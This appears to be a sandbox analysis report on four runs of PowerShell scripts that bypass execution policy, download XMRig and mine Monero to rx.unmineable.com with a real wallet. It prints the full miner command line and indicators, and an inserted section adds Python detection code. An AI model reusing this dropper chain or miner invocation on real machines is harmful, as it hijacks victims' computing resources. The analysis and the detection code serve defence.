memory/4448-92-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp

memory/2360-93-0x00007FFAD8ED3000-0x00007FFAD8ED4000-memory.dmp

memory/2360-94-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/2360-95-0x00007FFAD8ED0000-0x00007FFAD98BC000-memory.dmp

memory/4448-96-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp through memory/4448-156-0x00007FF769FB0000-0x00007FF76ABE3000-memory.dmp (61 consecutive dumps, indices 96 to 156, all of the same region of process 4448)

Analysis: behavioral31

Detonation Overview

Submitted 2024-05-25 15:43
Reported 2024-05-25 16:43
Platform win10v2004-20240508-en
Max time kernel 1791s
Max time network 1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp

Files

memory/1020-0-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oev4qx3i.job.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1020-10-0x0000017ABDDB0000-0x0000017ABDDD2000-memory.dmp

memory/1020-11-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/1020-12-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/1020-14-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/1020-15-0x0000017ABE310000-0x0000017ABE322000-memory.dmp

memory/1020-16-0x0000017ABE2F0000-0x0000017ABE2FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4704-47-0x00000241CB900000-0x00000241CB920000-memory.dmp

memory/4704-48-0x00000241CD2F0000-0x00000241CD310000-memory.dmp

memory/4704-49-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/1020-50-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/4704-53-0x000002425FEE0000-0x000002425FF00000-memory.dmp

memory/4704-52-0x00000241CD310000-0x00000241CD330000-memory.dmp

memory/1020-51-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

memory/4704-54-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/1020-55-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/4704-56-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/1020-57-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/4704-58-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-60-0x000002425FEE0000-0x000002425FF00000-memory.dmp

memory/4704-59-0x00000241CD310000-0x00000241CD330000-memory.dmp

memory/4704-61-0x00007FF747390000-0x00007FF747FC3000-memory.dmp through memory/4704-119-0x00007FF747390000-0x00007FF747FC3000-memory.dmp (59 consecutive dumps, indices 61 to 119, all of the same region of process 4704)

Analysis: behavioral19

Detonation Overview

Submitted 2024-05-25 15:43
Reported 2024-05-25 16:30
Platform win10v2004-20240508-en
Max time kernel 1791s
Max time network 1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 35.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

memory/1992-0-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phiyu05h.uuf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1992-10-0x0000016676C90000-0x0000016676CB2000-memory.dmp

memory/1992-11-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-12-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-14-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-15-0x0000016679410000-0x0000016679422000-memory.dmp

memory/1992-16-0x0000016676CE0000-0x0000016676CEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3748-47-0x0000029EAA700000-0x0000029EAA720000-memory.dmp

memory/3748-48-0x0000029EABF00000-0x0000029EABF20000-memory.dmp

memory/3748-49-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-53-0x0000029F3EAE0000-0x0000029F3EB00000-memory.dmp

memory/3748-52-0x0000029F3EB00000-0x0000029F3EB20000-memory.dmp

memory/1992-51-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

memory/3748-50-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/1992-54-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/3748-55-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-56-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-58-0x0000029F3EAE0000-0x0000029F3EB00000-memory.dmp

memory/3748-57-0x0000029F3EB00000-0x0000029F3EB20000-memory.dmp

memory/3748-59-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp through memory/3748-117-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp (59 consecutive dumps, indices 59 to 117, all of the same region of process 3748)

Analysis: behavioral22

Detonation Overview

Submitted 2024-05-25 15:43
Reported 2024-05-25 16:32
Platform win10-20240404-en
Max time kernel 1796s
Max time network 1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 216.107.17.2.in-addr.arpa udp
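
The detonations in this report differ only in the name of the dropped script; the chain is the same each time. powershell.exe runs a .ps1 from %TEMP% with -ExecutionPolicy bypass, downloads xmrig-6.21.3 (the github.com and objects.githubusercontent.com traffic), and launches xmrig.exe against rx.unmineable.com over stratum+ssl on port 443 with -a rx (RandomX) and an unMineable-style user field of the form COIN:ADDRESS.worker. The SeLockMemoryPrivilege requests are XMRig asking for the "Lock pages in memory" right it needs for huge pages. What follows is an editor-added detection example, not part of this report, of the sandbox, or of the sample: Python that parses the XMRig options (short and long forms) into pool host, port, coin, wallet and worker, scores the process-creation events, and cross-checks the network table for the pool host. The sample events are constructed from the rows above plus one benign control line that is not from the report; the option regex and the COIN:ADDRESS.worker split are assumed conventions, not a vendor API.

```python
"""Editor-added detection example for the PowerShell -> XMRig chain above.
Not sandbox output. Sample events are constructed from the report's tables;
the option regex and COIN:ADDRESS.worker split are assumed conventions."""
import re
from urllib.parse import urlsplit

# Pool schemes XMRig accepts. stratum+ssl on 443 looks like HTTPS on the wire,
# so the scheme on the command line is the signal, not the port.
STRATUM_SCHEMES = {"stratum+tcp", "stratum+ssl", "stratum+tls"}
# Short (-a/-o/-u/-p) and long (--algo/--url/--user/--pass) XMRig options.
FLAG_RE = re.compile(
    r'(?:^|\s)(?:-(?P<short>[aoup])\s+|--(?P<long>algo|url|user|pass)[=\s])'
    r'(?P<val>"[^"]*"|\S+)')
LONG_TO_SHORT = {"algo": "a", "url": "o", "user": "u", "pass": "p"}
PS_BYPASS_RE = re.compile(r"-ExecutionPolicy\s+bypass\b", re.IGNORECASE)
TEMP_PATH_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def parse_xmrig_cmdline(cmdline):
    """Pool and wallet fields from an XMRig command line; None if -o/--url
    does not name a stratum pool."""
    opts = {}
    for m in FLAG_RE.finditer(cmdline):
        key = m.group("short") or LONG_TO_SHORT[m.group("long")]
        opts[key] = m.group("val").strip('"')
    parts = urlsplit(opts.get("o", ""))
    if parts.scheme not in STRATUM_SCHEMES:
        return None
    # unMineable-style user field: COIN:ADDRESS.worker_name (assumed convention)
    coin, sep, rest = opts.get("u", "").partition(":")
    address, _, worker = rest.partition(".")
    return {"algo": opts.get("a"), "scheme": parts.scheme,
            "pool_host": parts.hostname, "pool_port": parts.port,
            "coin": coin if sep else None, "wallet": address if sep else coin,
            "worker": worker or None, "password": opts.get("p")}


def score_process(image, cmdline):
    """(severity, reason) findings for one process-creation event."""
    findings = []
    if PS_BYPASS_RE.search(cmdline) and TEMP_PATH_RE.search(cmdline):
        findings.append(("medium", "PowerShell -ExecutionPolicy bypass on a script under %TEMP%"))
    if TEMP_PATH_RE.search(image):
        findings.append(("medium", "executable launched from %TEMP%"))
    miner = parse_xmrig_cmdline(cmdline)
    if miner:
        findings.append(("high", "stratum miner -> %(scheme)s://%(pool_host)s:%(pool_port)s "
                                 "coin=%(coin)s worker=%(worker)s" % miner))
    return findings


def parse_network_row(line):
    """Parse one 'Country Destination Domain Proto' row; the Domain column may
    be empty (the report has such a row), leaving only three fields."""
    fields = line.split()
    if len(fields) == 3:
        fields.insert(2, "")
    if len(fields) != 4:
        raise ValueError("unexpected row: %r" % line)
    country, dest, domain, proto = fields
    host, _, port = dest.rpartition(":")
    return {"country": country, "host": host, "port": int(port),
            "domain": domain, "proto": proto}


def score_network(rows, pool_hosts):
    """DNS lookups for, and sessions to, the pool hosts named on the miner
    command line. Reverse (in-addr.arpa) lookups carry no new indicator."""
    return [(r["proto"], r["domain"], r["host"], r["port"]) for r in rows
            if r["domain"] in pool_hosts and not r["domain"].endswith(".in-addr.arpa")]


# Constructed sample events: two command lines and four network rows copied
# from the report, plus one benign control line that is not from the report.
SAMPLE_PROCESSES = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"'),
    (r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 '
     r"-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe -o report.txt"),
]
SAMPLE_NETWORK = [
    "US 8.8.8.8:53 rx.unmineable.com udp",
    "GB 161.35.34.195:443 rx.unmineable.com tcp",
    "US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp",
    "IE 52.111.236.23:443 tcp",
]


def run_sample():
    """Run both scorers over the constructed events: returns (findings keyed
    by image path, network hits)."""
    procs = {img: score_process(img, cmd) for img, cmd in SAMPLE_PROCESSES}
    miners = [parse_xmrig_cmdline(cmd) for _, cmd in SAMPLE_PROCESSES]
    pool_hosts = {m["pool_host"] for m in miners if m}
    rows = [parse_network_row(r) for r in SAMPLE_NETWORK]
    return procs, score_network(rows, pool_hosts)
```

Two caveats for anyone turning this into a production rule. First, port-based filtering would not catch this traffic: stratum+ssl on 443 is indistinguishable from HTTPS without inspecting the TLS SNI or certificate, so the command line and the resolved name are the usable indicators, which is why the example keys the network check on the host the miner was told to use rather than on the port. Second, the __PSScriptPolicyTest_*.ps1 entries in the Files lists are PowerShell's own AppLocker/WDAC policy probe, not sample artefacts; the MD5 c4ca4238a0b923820dcc509a6f75849b on several of them is simply the hash of the one-character string "1", so they should be excluded from any dropped-file rule.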

Files

memory/3484-0-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp

memory/3484-5-0x0000027BFC1B0000-0x0000027BFC1D2000-memory.dmp

memory/3484-8-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3484-9-0x0000027BFC260000-0x0000027BFC2D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dinji4vv.cei.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3484-18-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3484-25-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3484-48-0x0000027BFC300000-0x0000027BFC312000-memory.dmp

memory/3484-61-0x0000027BFC2E0000-0x0000027BFC2EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3088-90-0x00000214A7610000-0x00000214A7630000-memory.dmp

memory/3088-91-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3484-93-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp

memory/3088-92-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3484-94-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3088-95-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp through memory/3088-139-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp (45 consecutive dumps, indices 95 to 139, all of the same region of process 3088)

memory/3088-140-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-141-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-142-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-143-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-144-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-145-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-146-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-147-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-148-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-149-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-150-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-151-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-152-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-153-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-154-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-155-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:36

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
